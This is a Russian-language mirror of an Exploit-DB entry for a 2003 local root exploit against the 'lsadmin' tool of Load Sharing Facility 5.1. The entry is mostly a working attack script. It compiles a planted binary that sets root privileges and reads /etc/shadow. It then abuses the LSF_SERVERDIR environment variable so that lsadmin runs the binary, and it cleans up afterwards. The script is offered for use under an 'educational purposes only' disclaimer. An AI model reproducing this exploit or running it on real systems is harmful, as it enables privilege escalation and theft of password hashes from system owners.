- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 22628
- Проверка EDB
-
- Пройдено
- Автор
- TOMASZ GRABOWSKI
- Тип уязвимости
- LOCAL
- Платформа
- MULTIPLE
- CVE
- N/A
- Дата публикации
- 2003-03-20
Код:
source: https://www.securityfocus.com/bid/7655/info
It has been reported that Load Sharing Facility (LSF) does not properly handle input in environment variables. Because of this, an attacker may be able to gain escalated privileges on a vulnerable system.
# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ
# Proof of concept - for educational purposes only!
cat <<__END__> attacker_code.c
#include <stdio.h>
int main() {
FILE *secret_file;
FILE *temp_file;
char one_line[128];
setuid(0);setgid(0);
secret_file = fopen("/etc/shadow", "r");
temp_file = fopen(".temp.file", "w");
fgets(one_line, 120, secret_file);
fputs(one_line, temp_file);
fclose(secret_file); fclose (temp_file);
}
__END__
gcc attacker_code.c -o lim
chmod 777 lim
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file- Источник
- www.exploit-db.com
